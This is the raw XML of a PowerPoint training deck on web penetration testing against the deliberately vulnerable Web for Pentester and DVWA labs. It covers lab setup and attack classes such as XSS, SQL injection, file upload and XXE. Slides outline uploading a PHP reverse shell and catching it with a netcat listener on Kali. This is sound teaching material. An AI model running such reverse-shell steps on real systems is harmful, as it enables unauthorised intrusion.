            <a:off x="4897090" y="2225903"/>
            <a:ext cx="3896060" cy="122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3661127" y="2838604"/>
            <a:ext cx="1077388" cy="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38074" y="4259316"/>
            <a:ext cx="666785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1.Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox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Building Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>2.You must be used same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0"/>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>segment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-- Bridged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Adapter or NAT Network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034123" y="5743651"/>
            <a:ext cx="44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You can see this setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>on the next page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000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40619" y="17145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Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>: Web for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, DVWA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905041" y="1690689"/>
            <a:ext cx="2540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Attacker: Kali Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35283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613219"/>
            <a:ext cx="5819775" cy="51082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800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5:Execute Shell Command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97" y="3020794"/>
            <a:ext cx="6467475" cy="30575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6147054" y="5404740"/>
            <a:ext cx="822960" cy="429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3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425629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u"/>
            </a:pP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PHP-reverse shell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224" y="3017892"/>
            <a:ext cx="7829551" cy="206210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TW" sz="3200" dirty="0"/>
              <a:t>A shell will be attached to the TCP connection (reverse TCP connection). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>can run interactive programs such as telnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> 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 with this script.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86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3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66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1:open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-reverse-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shell.php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644920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-reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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shell.php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7756"/>
            <a:ext cx="90201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3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:Cheange LISTEN_IP(Kali Linux)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644920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-reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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shell.php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2989193"/>
            <a:ext cx="8524926" cy="28738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2412" y="4067175"/>
            <a:ext cx="3817638" cy="20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07362" y="3267075"/>
            <a:ext cx="2036463" cy="257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20122543" flipH="1">
            <a:off x="4338337" y="3500792"/>
            <a:ext cx="1228725" cy="489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334126" y="2342862"/>
            <a:ext cx="20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/>
              <a:t>ifconfig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644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46" y="2755778"/>
            <a:ext cx="6418907" cy="313204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3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3:Upload the shell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517962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u"/>
            </a:pP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-reverse-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shell.php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2037" y="4714875"/>
            <a:ext cx="2036463" cy="257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9124045">
            <a:off x="4217732" y="4856427"/>
            <a:ext cx="723900" cy="48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3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4:Start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netcat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listener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326884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lvp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1234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16" y="2787361"/>
            <a:ext cx="7653281" cy="32705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21487" y="2876550"/>
            <a:ext cx="1617363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2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37" y="2666999"/>
            <a:ext cx="7700965" cy="3689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3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5:Execute Shell Command</a:t>
            </a:r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124264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916" y="5705474"/>
            <a:ext cx="1617363" cy="650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36288"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012916" y="2767012"/>
            <a:ext cx="7787800" cy="35194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48857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3 :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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Shells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12916" y="921174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5:Execute Shell Command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125837" y="1744730"/>
            <a:ext cx="374333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/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916" y="3872700"/>
            <a:ext cx="2054134" cy="650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LDAP Attacks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LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Attacks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Building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4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attacks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54709"/>
            <a:ext cx="371475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What is XML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8650" y="2943132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 HTML and XML is that the former is mainly used to write webpages, and the HTML language (tag) is globally unified.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customize tags, but only change their tag attributes.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of the latter is for "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9038" y="6204695"/>
            <a:ext cx="8176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Learn more: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>://www.eztrust.com.tw/html/faq/qa_show.aspx?id=122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650" y="1972226"/>
            <a:ext cx="3846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Extensible Markup Language</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="XML 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44" y="101798"/>
            <a:ext cx="2492397" cy="28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49912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>XML Vulnerabilities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72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="XML-external-entity-attack-example | Span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07" y="877069"/>
            <a:ext cx="5264385" cy="535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30867" y="6211669"/>
            <a:ext cx="5662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https://securityboulevard.com/2019/09/xml-external-entity-xxe-attacks-web-based-application-security-part-5/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8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Traversal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Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr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0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https://www.hackingarticles.in/web-shells-penetration-testing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www.ithome.com.tw/news/137211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dougrathbone.com/blog/2012/07/09/donrsquot-accept-gifts-from-strangers-ndash-even-through-html-form-file-elements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www.youtube.com/watch?v=kcnJMKXnW1k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8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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ISO Download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://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Oracle VM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Download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www.virtualbox.org/wiki/Downloads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Kali Linux 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https://www.kali.org/downloads/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2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1:Add new v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>irtual machine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90" y="1825625"/>
            <a:ext cx="6784420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BC7F-3C97-418D-9200-43C7D62A39F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19550" y="2219326"/>
            <a:ext cx="67627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7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4710</TotalTime>
  <Words>964</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>272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4" baseType="lpstr">
      <vt:lpstr>Adobe 黑体 Std R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Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Web For Pentester Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Test Environment</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Download Images</vt:lpstr>
      <vt:lpstr>Step 1:Add new virtual machine</vt:lpstr>
      <vt:lpstr>Step 2:Name and Operating system</vt:lpstr>
      <vt:lpstr>Step 3:Set up memory</vt:lpstr>
      <vt:lpstr>Step 4:Create storage</vt:lpstr>
      <vt:lpstr>Step 5:Select type</vt:lpstr>
      <vt:lpstr>Step 6:Dynamic or static</vt:lpstr>
      <vt:lpstr>Step 7:Location and size</vt:lpstr>
      <vt:lpstr>Step 8:Configuration settings</vt:lpstr>
      <vt:lpstr>Step 9:Select image file</vt:lpstr>
      <vt:lpstr>Step 9:Select image file</vt:lpstr>
      <vt:lpstr>Step 9:Select image file</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 10:Configure the network</vt:lpstr>
      <vt:lpstr>Step 11:Start virtual machine</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>SQL Injections</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Commands Injection</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>File Include</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>File Upload Vulnerabilities</vt:lpstr>
      <vt:lpstr>Arbitrary File Upload Vulnerability &amp; Remote Code Execution</vt:lpstr>
      <vt:lpstr> 2020-04-24</vt:lpstr>
      <vt:lpstr>Introduction of PHP Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 1 : Code analysis</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 2 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>Example 3 : Web Shells</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>LDAP Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>What is XML？</vt:lpstr>
      <vt:lpstr>XML Vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Directory Traversal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PentesterLab:  web for pentester</dc:title>
  <dc:creator>owner</dc:creator>
  <cp:lastModifiedBy>Eric .</cp:lastModifiedBy>
  <cp:revision>204</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-25T07:12:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-04T04:48:44Z</dcterms:modified>
</cp:coreProperties>
</file>